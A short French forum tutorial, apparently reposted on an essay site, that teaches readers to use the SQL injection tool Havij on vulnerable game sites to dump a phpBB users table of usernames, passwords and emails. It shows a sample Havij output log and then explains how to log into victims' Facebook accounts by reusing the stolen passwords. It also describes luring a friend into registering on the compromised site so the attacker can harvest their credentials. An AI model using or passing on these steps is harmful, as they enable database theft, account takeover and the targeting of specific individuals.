Dissertations gratuites
Tout d'abord trouvez un site faillible et avec des mdp en clair si possible :rolleyes: C'est très facile à trouver, les site de jeux sont les meilleur pour ce tutoriel ;)
Alors ensuite, vous chopez ceci avec Havij: Pseudo,MDP,E-mail.
Maintenant comment faire ?
Et bien on va utiliser la débilité de facebook par exemple !
Les e-mail se trouve par millier ;) Donc qu'est-ce qu'on fait, et bien voici un exemple:
Havij 1.15 Pro by r3dm0v3 http://ITSecTeam.com http://Forum.ITSecTeam.com
Target: http://xxxxxxxx.com/game.php?id=%Inject_Here%1
Date: DATE :O
DB Detection: MySQL error based (Auto Detected)
Method: GET
Type: Integer (Auto Detected)
Data Base[/b]: XXXXXX_phpb1
Table: phpbb_users
Total Rows: 341 <------- :O 321 compte c'est beau :)
username user_password user_email user_newpasswd PSEUDO XXXXXXXXXXXXXXXXXXX XXXXXXXX@HOTMAIL.FR
J'ai donc son mot de passe, sont pseudo et son e-mail :rolleyes:
Go ---> Facebook.com, on met l'e-mail et le mot de passe, si l'utilisateur n'est pas prudent il aura mis les même mot de passe sur tout les site où il s'inscrit ! :P
C'est pas beau çà ?
Bon maintenant vous me direz, oui mais si la cible c'est un pote et qu'il est pas dans la liste du site ?
Mouhahaah xD Tellement easy !
T'a juste à lui dire de s'inscrire sur le site pour tester un jeu qu'il y a sur celui-ci.
Il s'inscrit, tu reHavij ! Tu voit son e-mail :O Et boum tu lui tombe dessus :)
Cette technique marche donc avec un peu tout vous l'aurez compris, y'en a beaucoup qui prenne les même pseudo sur tout les site aussi